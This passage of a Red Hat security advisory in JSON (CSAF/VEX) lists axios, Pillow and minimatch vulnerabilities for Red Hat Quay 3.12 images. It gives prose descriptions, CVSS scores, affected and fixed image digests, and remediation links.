"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-18T16:21:15+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:4942"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:6421325d2c7f726c34e365442ba15e8dce873aa4b3087239c0d6514feb702d6d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:9ca58008c4b6d439afa2d9286252c85c1845ca4764e9c5e914ffbbc12684178e_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:d547771f59990e5f90668bdb967120d92c6b12e6b6666f935510ae839a5b8f46_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:5c95eca6b2fb921c444c04c03cff58a301ce8d127b43369e4791b3295c06f95c_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:26718ccb95dc9c16e9a68affd07c8f1ad9c4e5c86164827278aa165f7e047d2c_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:60b48ecb4c6d6769ad65b841142affc252abd5bb484532f8063097f13ba311db_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:80315fc3e515b6824fea23d86995354821089da0433696024a091e79e8526dad_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f15f0ecb4db302df6d1cfbd7982b92e4911b774ed718c4ae6c6bf454154bcb1d_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:c3fcc8881b3cc3f44cd0f50825366b1e2462386ade01c6d7f50957720a2cb0ee_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:15a526a64adaaa0d711e1f6f91d92e7a31385ea5596bd80cd61d01b247899309_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:1dd39e160ca0759d55e636d7a849fb3c89dbf5d52484e3059e3c8a4ef251b4ce_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c1bce7e8d7de7fd8cfd98de842a6efd75c3c8f1add02646b6bc0b427a1d55f7_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:821a1a8274bed06ef5cf595656d919a2f0171fc2eaad04897b526159752d3066_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:04536d34e96ea1a8a5e3f54d55f1483bd017cdae867790e10ae18f6e4443d282_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:041f90dc8ecb773ba6c09d0a5f0b3660c5c4e81f1641bd823b37c7e33d966bca_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:66a357f4f825a657b8f0548901aef392421726e8bf2085806d15bbb9a6eb70bd_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6c90db8ea68ed0afd44aed2f773a8aea115c028fe6635ea87020d3e3fcb4fb90_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:a5c4bfea66cf0109f309bf70391748febdbb01c576ab5ec6a77be0d7729de13f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:f4777e6f609dc915c82a0b69a07bf7bbefb8762ed0012b5e45a3a5de858592b9_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:1f87190bc1a9a0d5854572b6d39a00069b95c79cfe7c63a4562aa7fcbcee4c83_s390x",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:448968df737e1fe9efbe549ce6cded18b2a6c544b96aa4550f15f7d803d4a2af_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:48ca0b3afbfdc52d0407f2e3d62addffc65ac1f71abac7ebb643a52138753a93_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:dd1db128bff6a9784c185e3f3ce5304a089489cb52b23212a8457f275d779ec1_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:2f62df99c2b7697461a2865380344c90a6fb8aec7b279f8f2f6e0684b662d19f_amd64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:4076a739c16c0567def8339bff5e8adca2f995217ae55428061cd0136a7e7a21_arm64",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:56bcc55b01c76a1eb7ad8b265cf9dfdd488fc62bc353e3822864a0f6c4f98ffb_ppc64le",
"Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:e39ee513b081c979409b52c41db9222496868b3910c01b5c04de6f3206f467b5_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:44efb07888bff09040aa413babedb3eed6ae9f329cb923ae9e09f2c65c507dd3_s390x",
